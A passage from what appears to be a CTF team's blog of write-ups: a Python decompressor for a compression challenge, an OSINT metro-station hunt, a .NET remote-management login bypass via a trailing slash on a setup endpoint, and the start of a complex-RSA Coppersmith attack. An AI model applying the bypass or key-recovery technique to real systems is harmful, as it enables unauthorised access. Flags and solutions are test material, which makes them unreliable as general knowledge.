<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#,MS,MN,ME,MR,GS,MI,[...],OLYMPIC,NIGHTLIFE,HOMEWORK,NETWORK,BRUNSWICK,
</span>
<span class="k">try</span><span class="p">:</span>
    <span class="mi">1</span><span class="o">/</span><span class="mi">0</span>
<span class="k">except</span> <span class="nb">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
    <span class="n">prog</span> <span class="o">=</span> <span class="n">e</span><span class="p">.</span><span class="n">__traceback__</span><span class="p">.</span><span class="n">tb_frame</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_locals</span><span class="p">[</span><span class="s">"prog"</span><span class="p">]</span>

<span class="n">table</span> <span class="o">=</span> <span class="p">(</span><span class="mi">145</span><span class="p">,</span><span class="mi">22134</span><span class="p">,</span><span class="mi">14665</span><span class="p">,</span><span class="mi">7025</span><span class="p">,</span><span class="mi">20</span><span class="p">,</span><span class="mi">43498</span><span class="p">,</span><span class="mi">6070</span><span class="p">,</span><span class="mi">2551</span><span class="p">,</span><span class="mi">60</span><span class="p">,</span><span class="mi">13988</span><span class="p">,</span><span class="mi">38948</span><span class="p">,</span><span class="mi">1820</span><span class="p">,</span><span class="mi">30148</span><span class="p">,</span><span class="mi">15</span><span class="p">,</span><span class="mi">85</span><span class="p">,</span><span class="mi">6351</span><span class="p">,</span><span class="mi">5350</span><span class="p">,</span><span class="mi">25</span><span class="p">,</span><span class="mi">5</span><span class="p">,</span><span class="mi">65</span><span class="p">,</span><span class="mi">555</span><span class="p">,</span><span class="mi">14565</span><span class="p">,</span><span class="mi">2027</span><span class="p">,</span><span class="mi">295</span><span class="p">,</span><span class="mi">735</span><span class="p">,</span><span class="mi">45643</span><span class="p">,</span><span class="mi">29266</span><span class="p">,</span><span class="mi">7705</span><span class="p">,</span><span class="mi">42888</span><span class="p">,</span><span class="mi">10966</span><span class="p">,</span><span class="mi">21</span><span class="p">,</span><span class="mi">4875</span><span class="p">,</span><span class="mi">325</span><span class="p">,</span><span class="mi">4725</span><span class="p">,</span><span class="mi">53578</span><span class="p">,</span><span class="mi">57958</span><span class="p">,</span><span class="mi">14261</span><span class="p">,</span><span class="mi">1220</span><span class="p">,</span><span class="mi">29394</span><span class="p">,</span><span class="mi">60128</span><span class="p">,</span><span class="mi">26679</span><span class="p">,</span><span class="mi">45243</span><span class="p">,</span><span class="mi">275</span><span class="p">,</span><span class="mi">2250</span><span class="p">,</span><span class="mi">1350</span><span class="p">,</span><span class="mi">23954</span><span class="p">,</span><span class="mi">585</span><span class="p">,</span><span class="mi">430</span><span class="p">,</span><span class="mi">90</span><span class="p">,</span><span class="mi">35098</span><span class="p">,</span><span class="mi">11101</span><span class="p">,</span><span class="mi">49537</span><span class="p">,</span><span class="mi">401</span><span class="p">,</span><span class="mi">51258</span><span class="p">,</span><span class="mi">1</span><span class="p">,</span><span class="mi">64213</span><span class="p">,</span><span class="mi">10636</span><span class="p">,</span><span class="mi">4410</span><span class="p">,</span><span class="mi">1945</span><span class="p">,</span><span class="mi">10338</span><span class="p">,</span><span class="mi">2786</span><span class="p">,</span><span class="mi">42248</span><span class="p">,</span><span class="mi">14110</span><span class="p">,</span><span class="mi">9063</span><span class="p">,</span><span class="mi">51277</span><span class="p">,</span><span class="mi">5</span><span class="p">,</span><span class="mi">1385</span><span class="p">,</span><span class="mi">330</span><span class="p">)</span>
<span class="n">offs</span> <span class="o">=</span> <span class="p">(</span><span class="mi">42</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="mi">29</span><span class="p">,</span><span class="mi">13</span><span class="p">,</span><span class="mi">19</span><span class="p">,</span><span class="mi">3</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="mi">0</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">lookup</span><span class="p">(</span><span class="n">th</span><span class="p">):</span>
    <span class="n">lo</span> <span class="o">=</span> <span class="mi">2</span>
    <span class="n">hi</span> <span class="o">=</span> <span class="mi">61828</span>
    <span class="k">while</span> <span class="n">lo</span> <span class="o">&lt;</span> <span class="n">hi</span><span class="p">:</span>
        <span class="n">mid</span> <span class="o">=</span> <span class="p">(</span><span class="n">lo</span> <span class="o">+</span> <span class="n">hi</span><span class="p">)</span> <span class="o">//</span> <span class="mi">2</span>
        <span class="n">a</span> <span class="o">=</span> <span class="n">prog</span><span class="p">.</span><span class="n">rfind</span><span class="p">(</span><span class="s">","</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">mid</span><span class="p">)</span><span class="o">+</span><span class="mi">1</span>
        <span class="n">b</span> <span class="o">=</span> <span class="n">prog</span><span class="p">.</span><span class="n">find</span><span class="p">(</span><span class="s">","</span><span class="p">,</span> <span class="n">mid</span><span class="p">)</span>
        <span class="n">h</span> <span class="o">=</span> <span class="n">table</span><span class="p">[</span><span class="nb">ord</span><span class="p">(</span><span class="n">prog</span><span class="p">[</span><span class="n">b</span><span class="o">-</span><span class="mi">1</span><span class="p">])</span> <span class="o">-</span> <span class="mi">65</span><span class="p">]</span>
        <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">b</span><span class="o">-</span><span class="n">a</span><span class="p">):</span>
            <span class="k">if</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="nb">len</span><span class="p">(</span><span class="n">offs</span><span class="p">):</span>
                <span class="n">h</span> <span class="o">+=</span> <span class="n">table</span><span class="p">[</span><span class="nb">ord</span><span class="p">(</span><span class="n">prog</span><span class="p">[</span><span class="n">a</span><span class="o">+</span><span class="n">i</span><span class="p">])</span> <span class="o">+</span> <span class="n">offs</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">-</span> <span class="mi">65</span><span class="p">]</span>
        <span class="k">if</span> <span class="n">h</span> <span class="o">&lt;</span> <span class="n">th</span><span class="p">:</span>
            <span class="n">lo</span> <span class="o">=</span> <span class="n">mid</span> <span class="o">+</span> <span class="mi">1</span>
        <span class="k">else</span><span class="p">:</span>
            <span class="n">hi</span> <span class="o">=</span> <span class="n">mid</span>
    <span class="k">return</span> <span class="n">lo</span>
</code></pre></div></div>

<p>One more final trick I used was to get a tiny bit more memory by clearing <code class="language-plaintext highlighter-rouge">sys.argv</code>, thereby freeing the large base64-encoded version of the program and buying around 100KB of extra memory to work with. I needed to do this because compiling the program itself still required more memory than was available:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">sys</span>
<span class="n">sys</span><span class="p">.</span><span class="n">argv</span><span class="p">[:]</span> <span class="o">=</span> <span class="p">[]</span>

<span class="k">exec</span><span class="p">(</span><span class="sa">r</span><span class="s">"""
[rest of the program]
"""</span><span class="p">)</span>
</code></pre></div></div>

<p>Putting this all together produces the final decompressor:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#,MS,MN,ME,MR,GS,MI,[...],OLYMPIC,NIGHTLIFE,HOMEWORK,NETWORK,BRUNSWICK,
</span><span class="kn">import</span> <span class="nn">sys</span>
<span class="c1"># get ourselves just a little more memory to work with
</span><span class="n">sys</span><span class="p">.</span><span class="n">argv</span><span class="p">[:]</span> <span class="o">=</span> <span class="p">[]</span>

<span class="k">try</span><span class="p">:</span>
    <span class="mi">1</span><span class="o">/</span><span class="mi">0</span>
<span class="k">except</span> <span class="nb">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
    <span class="n">prog</span> <span class="o">=</span> <span class="n">e</span><span class="p">.</span><span class="n">__traceback__</span><span class="p">.</span><span class="n">tb_frame</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_locals</span><span class="p">[</span><span class="s">"prog"</span><span class="p">]</span>

<span class="k">exec</span><span class="p">(</span><span class="sa">r</span><span class="s">"""
table = (145,22134,14665,7025,20,43498,6070,2551,60,13988,38948,1820,30148,15,85,6351,5350,25,5,65,555,14565,2027,295,735,45643,29266,7705,42888,10966,21,4875,325,4725,53578,57958,14261,1220,29394,60128,26679,45243,275,2250,1350,23954,585,430,90,35098,11101,49537,401,51258,1,64213,10636,4410,1945,10338,2786,42248,14110,9063,51277,5,1385,330)
offs = (42,0,29,13,19,3,0,0,0,0,0)
def lookup(th):
    lo = 2
    hi = 61828
    while lo &lt; hi:
        mid = (lo + hi) // 2
        a = prog.rfind(",", 0, mid)+1
        b = prog.find(",", mid)
        h = table[ord(prog[b-1]) - 65]
        for i in range(b-a):
            if i &lt; len(offs):
                h += table[ord(prog[a+i]) + offs[i] - 65]
        if h &lt; th:
            lo = mid + 1
        else:
            hi = mid
    return lo

leet_table = {
    'A': '4',
    'B': '8',
    'E': '3',
    'G': '6',
    'I': '1',
    'O': '0',
    'S': '5',
    'T': '7',
    'Z': '2'
}

cur_byte = 0
cur_bit = 0

def read_bits(n):
    global cur_bit, cur_byte
    res = 0
    resbits = 0
    while resbits &lt; n:
        chunk = min(n - resbits, 8 - cur_bit)
        t = (data[cur_byte] &gt;&gt; cur_bit) &amp; ((1 &lt;&lt; chunk) - 1)
        res |= t &lt;&lt; resbits
        resbits += chunk
        cur_bit += chunk
        if cur_bit == 8:
            cur_bit = 0
            cur_byte += 1
    return res

p = 0
while p &lt; 2028:
    t = lookup(read_bits(18))
    while prog[t] != ",":
        c = prog[t]
        if c in leet_table and read_bits(1):
            sys.stdout.write(str(leet_table[c]))
        else:
            sys.stdout.write(c)
        t += 1
        p += 1
    sys.stdout.write(" ")
    sys.stdout.flush()
    p += 1

while p &lt; 2048:
    print(chr(read_bits(8)), end="")
    p += 1

sys.stdout.flush()
exit(0)
"""</span><span class="p">)</span>
</code></pre></div></div>

<h2 id="conclusion">Conclusion</h2>

<p>This compressor is able to encode 2048 bytes of data in around 740 bytes on average (around 1308 points), more than sufficient to top the leaderboard. Running it several times produces different results, with the best result out of several runs being 1320 points (flag: <code class="language-plaintext highlighter-rouge">941379cb175c2e078e9d65606fc4ef3048468e0a4d45c717094dd268c0cafb60.1320</code>).</p>

<p>For “style” reasons, I decided to go a little further. Changing the constant 2028 to 2040 reduces the length of the (inefficiently-encoded) tail, at the risk of occasionally failing if the final word is too long. With this change, I was able to quickly obtain a score of <strong>1337 points</strong> (flag: <code class="language-plaintext highlighter-rouge">2fdd6a0e1801daa160f5475fb710879dd3f1bf6774da6c92e8f63867849b1cef.1337</code>). I also obtained slightly higher scores (up to 1340: <code class="language-plaintext highlighter-rouge">d5aedd5fcd9177849ba5d174c79a7074d66f60d911338616eb044290d9081088.1340</code>), but chose not to submit them. Here’s how the leaderboard looked like by the end of the CTF:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>           Team           |     Score       |           Time             
--------------------------+-----------------+----------------------------
 Maple Bacon              | {"score": 1337} | 2024-06-30 19:24:57.567+00
 thehackerscrew           | {"score": 980}  | 2024-06-30 19:49:18.4+00
 r3kapig                  | {"score": 859}  | 2024-06-30 13:29:04.553+00
 The Flat Network Society | {"score": 856}  | 2024-06-29 17:17:16.553+00
 Team Austria             | {"score": 850}  | 2024-06-29 19:03:02.087+00
 Perperikon               | {"score": 843}  | 2024-06-29 19:59:56.281+00
 Brunnerne                | {"score": 837}  | 2024-06-30 12:09:16.699+00
 Kalmarunionen            | {"score": 649}  | 2024-06-30 15:04:40.344+00
 pwnlentoni               | {"score": 603}  | 2024-06-30 10:46:12.362+00
 gsitcia                  | {"score": 512}  | 2024-06-30 01:46:13.402+00
</code></pre></div></div>

<p>This was a very fun challenge, with a rather unexpected twist in the form of some harsh restrictions on the Python side. Here’s a summary of the solution:</p>

<ul>
  <li>Use <code class="language-plaintext highlighter-rouge">gperf</code> to produce a perfect hash function for the wordlist, which can be efficiently implemented in C and compiled with the XC8 compiler.</li>
  <li>The compressor outputs 18 bits per word (regardless of word length), plus one bit per 1337-speakable character in the word.</li>
  <li>On the decompressor side, smuggle the entire wordlist in a comment to keep the overall size under the command-line argument size, and to avoid blowing the memory limit during <code class="language-plaintext highlighter-rouge">exec</code>.</li>
  <li>Obtain access to the embedded wordlist by extracting the <code class="language-plaintext highlighter-rouge">prog</code> variable from the parent stack frame via an exception object.</li>
  <li>Clear <code class="language-plaintext highlighter-rouge">sys.argv</code> to free up a bit more memory, and use a nested <code class="language-plaintext highlighter-rouge">exec</code> to avoid immediately blowing the memory limit in the outer <code class="language-plaintext highlighter-rouge">exec</code>.</li>
  <li>Use a binary search to search the wordlist each time, to avoid allocating more than O(1) extra memory, and avoid blowing the CPU time limit on an expensive (but simple) linear search.</li>
  <li>Use a slightly more aggressive implementation with a small probability of failure in order to score exactly 1337 points (“style”).</li>
</ul>]]></content><author><name>Robert Xiao</name></author><summary type="html"><![CDATA[Problem Description]]></summary></entry><entry><title type="html">[R3CTF/YUANHENGCTF-2024] Transit</title><link href="https://maplebacon.org/2024/06/r3ctf-yuanhengctf2024-Transit/" rel="alternate" type="text/html" title="[R3CTF/YUANHENGCTF-2024] Transit" /><published>2024-06-15T00:00:00+00:00</published><updated>2024-06-15T00:00:00+00:00</updated><id>https://maplebacon.org/2024/06/r3ctf-yuanhengctf2024-Transit</id><content type="html" xml:base="https://maplebacon.org/2024/06/r3ctf-yuanhengctf2024-Transit/"><![CDATA[<h2 id="r3ctfyuanhengctf-2024-transit-challenge-misc">R3CTF/YUANHENGCTF 2024 Transit Challenge [MISC]</h2>

<p>Authors: <a href="https://jade.fyi">Jade Lovelace</a>, <a href="https://github.com/frankuyan">Frank Yan</a></p>

<h2 id="tldr">TL;DR</h2>
<p>Utilize the overhead signage to identify the city and metro system. Scan through local Chinese media for any images of local metro rolling stock.  Use the rolling stock number to identify the line and stations. Use the street view images and line schematic to identify the station.</p>

<h2 id="challenge-description">Challenge Description</h2>

<p>This is an OSINT chal! The city’s rail transit is like the veins of time, glides effortlessly through the concrete jungle, transforming every journey into a flowing tapestry. So which station is this?</p>

<p>The flag format is R3CTF{city_lowercase_name_endswith_station}. For example the Huixin Xijie Nankou station of the Beijing Subway would be R3CTF{beijing_huixin_xijie_nankou_station}.</p>

<h2 id="the-image">The Image</h2>
<p><img src="/assets/images/r3ctf2024/e6007e3f-e141-470a-8294-6828ffe8bc43.jpg" alt="image" /></p>

<h2 id="solution">Solution</h2>
<p>We took the image and stared at it to try to figure out if it was a metro or mainline railway. Our main hint that it was a metro is the grade in the background but we kinda just guessed.</p>

<p>We looked at the overhead signage identifying the supports for the catenary, and noticed that it was in two parts, the first one seemingly being track ID or segment ID or so, and the second one being sequential as you go along the line, as seen in the picture.</p>

<p>We decided to do this by just <a href="https://en.wikipedia.org/wiki/Urban_rail_transit_in_China#Urban_rapid_transit_lines">dorking wikipedia</a> and googling around for Chinese metros looking for ones that use the same style of trackside signage for their overhead lines.</p>

<p>Google results usually yield schematic subway maps of the system. Thankfully Frank does read Chinese, and Baidu is more helpful in giving out images of rolling stock on tracks.</p>

<p>We started out with “[<code class="language-plaintext highlighter-rouge">Name of tier one/two Chinese cities</code>] + 地铁轨道交通 + 铁轨 (subway transportation system + railtracks)” and have found some images.</p>

<p>Shanghai does not have visible hanging signs on overhead powerlines.</p>

<p><img src="/assets/images/r3ctf2024/1a29e466-761d-4266-9532-d3bc3ba22e70.png" alt="Shanghai" /></p>

<p>Beijing does use a few hanging signs, but they are usually three digit numbers on a blue background.</p>

<p><img src="/assets/images/r3ctf2024/5162f04c-1a34-4d29-ba82-d18e39217c95.png" alt="Beijing" /></p>

<p>Chengdu on the other hand, uses a three character system with the first letter being an alphabet. Although the colorscheme does resemble to the image (black letters on white), it uses a different font with wider characters.</p>

<p><img src="/assets/images/r3ctf2024/d1075b76-ab75-41c4-82ed-3213dfbb8721.png" alt="Chengdu" /></p>

<p>After going through an exhaustive list of tier one and two Chinese cities, we stumbled upon a picture from Hangzhou’s metro system.</p>

<p>It has an overhead signage that actually match the same track segment, M368.</p>

<p><img src="/assets/images/r3ctf2024/c7405574-8c7a-46f0-8418-3e8bc8d0e3d9.png" alt="Hangzhou" /></p>

<p>We now have the rolling stock number <code class="language-plaintext highlighter-rouge">190181</code> and the line color turquoise blue. Given that the majority of Chinese systems use a numbered system to name metro lines and associate a unique color to each line, we are getting closer to the flag.</p>

<p>We then went on Wikipedia looking at Hangzhou metro, to figure out which line it was by looking at the rolling stock and found it was line 19:</p>

<p><img src="/assets/images/r3ctf2024/35c99cb7-1d8b-4bdd-9cc7-85e464993e63.png" alt="Line 19" /></p>

<p>Line 19 is an airport express line that only partially opened in 2022. Baidu Baike tells us that there are four elevated stations on line 19.</p>

<p><img src="/assets/images/r3ctf2024/7711c0fa-bfd8-445a-9d40-2aaef9e75b65.png" alt="Baidu Baike" /></p>

<p>高架 means elevated while 地下 means underground. This helps us to narrow down to</p>
<ul>
  <li>御道站(Yudao Station)</li>
  <li>平澜路站 (Pinglan Road Station)</li>
  <li>耕文路站 (Gengwen Road Station)</li>
  <li>知行路站 (Zhixing Road Station)</li>
</ul>

<p>While these stations all share the common features of being elevated and running in parallel along the Hangyong Expressway (the viaduct in the picture).</p>

<p>We decided to further examine the street view at each of the four sites.</p>

<p>平澜路站 (Pinglan Road Station) provides a view of a four-lane highway with rows of trees densely lined to its sides. We decided to move on to the other three stations, but the same highway is repeated throughout.</p>

<p>Until we realized…</p>

<p><img src="/assets/images/r3ctf2024/34d246c8-ba1d-4f09-b539-8e74070ac546.png" alt="Street View" /></p>

<p>These images are from August 2017.</p>

<p>Clearly, given China’s otherworldly pace of construction, most information from 2017 can be considered to be outdated.</p>

<p>Hence, we just tried to input the names of the four stations.</p>

<h2 id="flag">Flag</h2>

<p><code class="language-plaintext highlighter-rouge">R3CTF{hangzhou_zhixing_road_station}</code></p>]]></content><author><name>frankuu</name></author><summary type="html"><![CDATA[R3CTF/YUANHENGCTF 2024 Transit Challenge [MISC]]]></summary></entry><entry><title type="html">[NahamCon CTF 2024] Helpful Desk</title><link href="https://maplebacon.org/2024/06/nahamconctf-helpfuldesk/" rel="alternate" type="text/html" title="[NahamCon CTF 2024] Helpful Desk" /><published>2024-06-01T00:00:00+00:00</published><updated>2024-06-01T00:00:00+00:00</updated><id>https://maplebacon.org/2024/06/nahamconctf-helpfuldesk</id><content type="html" xml:base="https://maplebacon.org/2024/06/nahamconctf-helpfuldesk/"><![CDATA[<h2 id="problem-description">Problem Description</h2>

<blockquote>
  <p>HelpfulDesk is the go-to solution for small and medium businesses who need remote monitoring and management. Last night, HelpfulDesk released a security bulletin urging everyone to patch to the latest patch level. They were scarce on the details, but I bet that can’t be good…</p>
</blockquote>

<p>This was categorized as a web challenge, although most of my time on it was spent reverse engineering.</p>

<p>Difficulty: easy</p>

<h2 id="initial-research">Initial Research</h2>

<p>Opening up the URL, we see this is supposed to be a login to a remote access
software. There’s a note at the top telling us to download the latest update
for important security fixes. Clicking the note brings us to an “updates” page
with a list of releases we can download. Presumably the current instance is
running the old insecure version, so let’s download it and the latest and
find the difference.</p>

<h2 id="exploring-the-codebase">Exploring the codebase</h2>

<p>Downloading the two versions and unzipping them, we see this is a .NET server.
Running diff on the folders, we see the only thing that has changed is
HelpfulDesk.dll.</p>

<h2 id="decompiling">Decompiling</h2>

<p>Let’s decompile the old and new versions of the DLL with AvaloniaILSpy.
Renaming the dlls for convenience to HelpfulDesk-old and HelpfulDesk-new,
we can conveniently export the decompiled code to a flat text file by
right-clicking each dll and choosing “Save Code.”</p>

<p>Now we can open both files in Emacs and use ediff to find the changes.
After skipping through the filenames and a few uninteresting hashes, we
only find one significant change:</p>

<h3 id="helpfuldesk-newdll">HelpfulDesk-new.dll</h3>

<div class="language-c# highlighter-rouge"><div class="highlight"><pre class="highlight"><code>  <span class="k">public</span> <span class="n">IActionResult</span> <span class="nf">SetupWizard</span><span class="p">()</span>
  <span class="p">{</span>
      <span class="c1">//IL_0018: Unknown result type (might be due to invalid IL or missing references)</span>
      <span class="c1">//IL_001d: Unknown result type (might be due to invalid IL or missing references)</span>
      <span class="k">if</span> <span class="p">(</span><span class="n">File</span><span class="p">.</span><span class="nf">Exists</span><span class="p">(</span><span class="n">_credsFilePath</span><span class="p">))</span>
      <span class="p">{</span>
          <span class="n">PathString</span> <span class="n">path</span> <span class="p">=</span> <span class="p">((</span><span class="n">ControllerBase</span><span class="p">)</span><span class="k">this</span><span class="p">).</span><span class="nf">get_HttpContext</span><span class="p">().</span><span class="nf">get_Request</span><span class="p">().</span><span class="nf">get_Path</span><span class="p">();</span>
          <span class="kt">string</span> <span class="n">text</span> <span class="p">=</span> <span class="p">((</span><span class="n">PathString</span><span class="p">)(</span><span class="k">ref</span> <span class="n">path</span><span class="p">)).</span><span class="nf">get_Value</span><span class="p">().</span><span class="nf">TrimEnd</span><span class="p">(</span><span class="sc">'/'</span><span class="p">);</span>
          <span class="k">if</span> <span class="p">(</span><span class="n">text</span><span class="p">.</span><span class="nf">Equals</span><span class="p">(</span><span class="s">"/Setup/SetupWizard"</span><span class="p">,</span> <span class="n">StringComparison</span><span class="p">.</span><span class="n">OrdinalIgnoreCase</span><span class="p">))</span>
          <span class="p">{</span>
              <span class="k">return</span> <span class="p">(</span><span class="n">IActionResult</span><span class="p">)(</span><span class="kt">object</span><span class="p">)((</span><span class="n">Controller</span><span class="p">)</span><span class="k">this</span><span class="p">).</span><span class="nf">View</span><span class="p">(</span><span class="s">"Error"</span><span class="p">,</span> <span class="p">(</span><span class="kt">object</span><span class="p">)</span><span class="k">new</span> <span class="n">ErrorViewModel</span>
                                                                    <span class="p">{</span>
                                                                        <span class="n">RequestId</span> <span class="p">=</span> <span class="s">"Server already set up."</span><span class="p">,</span>
                                                                        <span class="n">ExceptionMessage</span> <span class="p">=</span> <span class="s">"Server already set up."</span><span class="p">,</span>
                                                                        <span class="n">StatusCode</span> <span class="p">=</span> <span class="m">403</span>
                                                                    <span class="p">});</span>
          <span class="p">}</span>
      <span class="p">}</span>
      <span class="k">return</span> <span class="p">(</span><span class="n">IActionResult</span><span class="p">)(</span><span class="kt">object</span><span class="p">)((</span><span class="n">Controller</span><span class="p">)</span><span class="k">this</span><span class="p">).</span><span class="nf">View</span><span class="p">();</span>
  <span class="p">}</span>
</code></pre></div></div>

<h3 id="helpfuldesk-olddll">HelpfulDesk-old.dll</h3>

<div class="language-c# highlighter-rouge"><div class="highlight"><pre class="highlight"><code>  <span class="k">public</span> <span class="n">IActionResult</span> <span class="nf">SetupWizard</span><span class="p">()</span>
  <span class="p">{</span>
      <span class="c1">//IL_0018: Unknown result type (might be due to invalid IL or missing references)</span>
      <span class="c1">//IL_001d: Unknown result type (might be due to invalid IL or missing references)</span>
      <span class="k">if</span> <span class="p">(</span><span class="n">File</span><span class="p">.</span><span class="nf">Exists</span><span class="p">(</span><span class="n">_credsFilePath</span><span class="p">))</span>
      <span class="p">{</span>
          <span class="n">PathString</span> <span class="n">path</span> <span class="p">=</span> <span class="p">((</span><span class="n">ControllerBase</span><span class="p">)</span><span class="k">this</span><span class="p">).</span><span class="nf">get_HttpContext</span><span class="p">().</span><span class="nf">get_Request</span><span class="p">().</span><span class="nf">get_Path</span><span class="p">();</span>
          <span class="kt">string</span> <span class="k">value</span> <span class="p">=</span> <span class="p">((</span><span class="n">PathString</span><span class="p">)(</span><span class="k">ref</span> <span class="n">path</span><span class="p">)).</span><span class="nf">get_Value</span><span class="p">();</span>
          <span class="k">if</span> <span class="p">(</span><span class="k">value</span><span class="p">.</span><span class="nf">Equals</span><span class="p">(</span><span class="s">"/Setup/SetupWizard"</span><span class="p">,</span> <span class="n">StringComparison</span><span class="p">.</span><span class="n">OrdinalIgnoreCase</span><span class="p">))</span>
          <span class="p">{</span>
              <span class="k">return</span> <span class="p">(</span><span class="n">IActionResult</span><span class="p">)(</span><span class="kt">object</span><span class="p">)((</span><span class="n">Controller</span><span class="p">)</span><span class="k">this</span><span class="p">).</span><span class="nf">View</span><span class="p">(</span><span class="s">"Error"</span><span class="p">,</span> <span class="p">(</span><span class="kt">object</span><span class="p">)</span><span class="k">new</span> <span class="n">ErrorViewModel</span>
                                                                    <span class="p">{</span>
                                                                        <span class="n">RequestId</span> <span class="p">=</span> <span class="s">"Server already set up."</span><span class="p">,</span>
                                                                        <span class="n">ExceptionMessage</span> <span class="p">=</span> <span class="s">"Server already set up."</span><span class="p">,</span>
                                                                        <span class="n">StatusCode</span> <span class="p">=</span> <span class="m">403</span>
                                                                    <span class="p">});</span>
          <span class="p">}</span>
      <span class="p">}</span>
      <span class="k">return</span> <span class="p">(</span><span class="n">IActionResult</span><span class="p">)(</span><span class="kt">object</span><span class="p">)((</span><span class="n">Controller</span><span class="p">)</span><span class="k">this</span><span class="p">).</span><span class="nf">View</span><span class="p">();</span>
  <span class="p">}</span>
</code></pre></div></div>

<h2 id="exploit">Exploit</h2>

<p>I don’t know the exact mechanisms here, but at
a high level it seems to be controlling access to the /Setup/SetupWizard
endpoint. If the credential file exists, it denies access to the endpoint.
Presumably the SetupWizard lets us reset credentials, so this ensures only the
admin doing the initial setup can access it.</p>

<p>The difference between the function in the old and new files is that the new one
strips trailing slashes from /Setup/SetupWizard. We can see the security flaw: if
we navigate to the path with the trailing slash, the value.Equals() won’t be triggered,
but ASP.NET will ignore the slash and serve us the Setup page.</p>

<p>Giving it a try, this works! I get the setup page and reset the login credentials. I
then login and find the flag on the first connected computer’s desktop.</p>]]></content><author><name>edaigle</name></author><summary type="html"><![CDATA[Problem Description]]></summary></entry><entry><title type="html">[SDCTF 2024] ReallyComplexProblem</title><link href="https://maplebacon.org/2024/05/sdctf-reallycomplexproblem/" rel="alternate" type="text/html" title="[SDCTF 2024] ReallyComplexProblem" /><published>2024-05-19T00:00:00+00:00</published><updated>2024-05-19T00:00:00+00:00</updated><id>https://maplebacon.org/2024/05/sdctf-reallycomplexproblem</id><content type="html" xml:base="https://maplebacon.org/2024/05/sdctf-reallycomplexproblem/"><![CDATA[<h2 id="problem-description">Problem Description</h2>

<p>We have a ciphertext that we have to decrypt in 48 hours. Luckily, one of our guys at the NSA was able to take a
screenshot of the computer as it was performing the encryption, unfortunately it only captured part of the screen. Can
you help us break the cipher?</p>

<ul>
  <li>Difficulty: Hard</li>
  <li>Tags: Crypto</li>
  <li>author: 18lauey2</li>
</ul>

<h4 id="attachments">Attachments</h4>

<p><a href="/assets/code/sdctf-2024/reallycomplexproblem/CRSA.py">CRSA.py</a> 
<a href="/assets/code/sdctf-2024/reallycomplexproblem/LEAK.png">LEAK.png</a></p>

<h2 id="tldr">TL;DR</h2>
<p>Modified coppersmith method that converts the complex valued matrix into a real matrix through a canonical embedding and
solve it like normal.</p>

<h2 id="introduction-audience-and-pre-requisites">Introduction, audience, and pre-requisites</h2>

<p>This writeup, like most of my writeups, is geared towards people with an elementary understanding of Math. Additionally,
this writeup focuses on the logic behind the solution as opposed to <em>just</em> the solution.</p>

<p>The pre-requisites that would be nice to know before reading this are:</p>
<ul>
  <li>The RSA encryption and decryption scheme Basic modular arithmetic Matrix algebra (vectors, linear combinations, and</li>
  <li>
    <p>matrices) An elementary understanding of complex numbers</p>

    <p>Alright then. Sit tight and buckle up because we are in for a doozy!</p>
  </li>
</ul>

<h2 id="challenge-overview-and-inspecting-the-code">Challenge Overview and Inspecting the Code</h2>

<p>The challenge performs RSA with complex integers (Gaussian Integers: $\mathbb{Z}[i]$) as opposed to regular Integers
$\mathbb{Z}$. A Complex integer is a complex number $a + bi$ such that $a, b \in \mathbb{Z}$.</p>

<p>Fortunately, the logic behind the algorithm, Complex-RSA (CRSA), remains fairly familiar with a few caveats:</p>
<ul>
  <li>We say that a Gaussian integer $w$ is prime if its norm is prime.
    <ul>
      <li>“What’s a norm?” In this case, consider a norm to be defined as $Re(w)^2 + Im(w)^2$. (This can be interpreted,</li>
    </ul>
  </li>
  <li>geometrically, as the square of the point’s distance from the origin) Once we generate our primes <code class="language-plaintext highlighter-rouge">p</code> and <code class="language-plaintext highlighter-rouge">q</code>, the
rest of the process is the same as regular RSA. (I’m skipping over
details for modular exponentiation because it’s not relevant to the challenge)</li>
</ul>

<p>The second part of the challenge involves our LEAKed picture which features a terminal with output that reads the values
of <code class="language-plaintext highlighter-rouge">N</code>, <code class="language-plaintext highlighter-rouge">ciphertext</code>, and a some portion of <code class="language-plaintext highlighter-rouge">p</code>. Interestingly enough, we see about two-thirds of both the real and the
imaginary part of <code class="language-plaintext highlighter-rouge">p</code> with the rest covered by the beautiful hand-drawn raccoon</p>

<h2 id="but-were-missing-bits-now-what">But we’re missing bits! Now what?</h2>

<p>You’re right. There is still a bit of work to do if we would like to decrypt our message. Alright, let’s take a deep
breath and work step-by-step. What information do we need to retrieve the original plaintext <code class="language-plaintext highlighter-rouge">m</code>.</p>

<p>To decrypt a message we need <code class="language-plaintext highlighter-rouge">d</code> which is defined as <code class="language-plaintext highlighter-rouge">e^-1 (mod (norm(p)-1)*(norm(q)-1))</code>. To find <code class="language-plaintext highlighter-rouge">d</code>, we need <code class="language-plaintext highlighter-rouge">p</code> and
<code class="language-plaintext highlighter-rouge">q</code> which in turn require us to factor <code class="language-plaintext highlighter-rouge">N = pq</code>. To factorize <code class="language-plaintext highlighter-rouge">N</code>, we would need “recover” <code class="language-plaintext highlighter-rouge">p</code> from the information that
was leaked and divide <code class="language-plaintext highlighter-rouge">N</code> by <code class="language-plaintext highlighter-rouge">p</code>.</p>

<p><strong>Oh boy.</strong> That’s a lot. All these steps are fairly straightforward with the exception of recovering <code class="language-plaintext highlighter-rouge">p</code>. So, our goal
is to recover this value.</p>

<p>After some painful counting and testing, There’s roughly about 155 digits for both the real and imaginary parts. we have
